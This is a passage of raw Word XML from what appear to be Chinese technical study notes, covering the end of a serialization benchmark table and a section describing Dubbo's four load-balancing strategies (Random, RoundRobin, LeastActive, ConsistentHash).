            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>657</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Java Serialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>963</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>630</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E575AB" w:rsidRDefault="00DA54D7" w:rsidP="00A03B87">
      <w:hyperlink r:id="rId303" w:history="1">
        <w:r w:rsidR="0036017D" w:rsidRPr="008E29F8">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://www.bubuko.com/infodetail-1414938.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0036017D" w:rsidRPr="00D70B17" w:rsidRDefault="0036017D" w:rsidP="00A03B87"/>
    <w:p w:rsidR="001B6788" w:rsidRPr="00F70D36" w:rsidRDefault="00590247" w:rsidP="00F70D36">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0087693B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0087693B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r w:rsidR="0087693B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用什么负载均衡算法</w:t>
      </w:r>
      <w:r w:rsidR="0087693B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043144E" w:rsidRDefault="00BB5E45" w:rsidP="0043144E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Random</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> LoadBalance Stable 随机，按权重设置随机概率（推荐使用） 在一个截面上碰撞的概率高，重试时，可能出现瞬间压力不均 可用于生产环境 Alibaba</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043144E" w:rsidRDefault="00BB5E45" w:rsidP="0043144E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RoundRobin LoadBalance Stable 轮循，按公约后的权重设置轮循比率 存在慢的机器累积请求问题，极端情况可能产生雪崩 可用于生产环境</w:t>
      </w:r>
      <w:r w:rsidR="00661204">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043144E" w:rsidRDefault="00BB5E45" w:rsidP="0043144E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LeastActive LoadBalance Stable 最少活跃调用数，相同活跃数的随机，活跃数指调用前后计数差，使慢的机器收到更少请求 不支持权重，在容量规划时，不能通过权重把压力导向一台机器压测容量 可用于生产环境</w:t>
      </w:r>
      <w:r w:rsidR="00181C6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5E45" w:rsidRDefault="00BB5E45" w:rsidP="0043144E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ConsistentHash LoadBalance Stable 一致性Hash，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6091A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相同参数的请求总是发到同一提供者</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，当某一台提供者挂时，原本发往该提供者的请求，基于虚拟节点，平摊到其它提供者，不会引起剧烈变动 压力分摊不均 可用于生产环境</w:t>
      </w:r>
      <w:r w:rsidR="0057191E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1F9C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Random LoadBalance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>随机，按权重设置随机概率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>在一个截面上碰撞的概率高，但调用量越大分布越均匀，而且按概率使用权重后也比较均匀，有利于动态调整提供者权重。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RoundRobin LoadBalance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>轮循，按公约后的权重设置轮循比率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>存在慢的提供者累积请求问题，比如：第二台机器很慢，但没挂，当请求调到第二台时就卡在那，久而久之，所有请求都卡在调到第二台上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LeastActive LoadBalance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>最少活跃调用数，相同活跃数的随机，活跃数指调用前后计数差。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>使慢的提供者收到更少请求，因为越慢的提供者的调用前后计数差会越大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ConsistentHash LoadBalance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>一致性Hash，相同参数的请求总是发到同一提供者。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>当某一台提供者挂时，原本发往该提供者的请求，基于虚拟节点，平摊到其它提供者，不会引起剧烈变动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
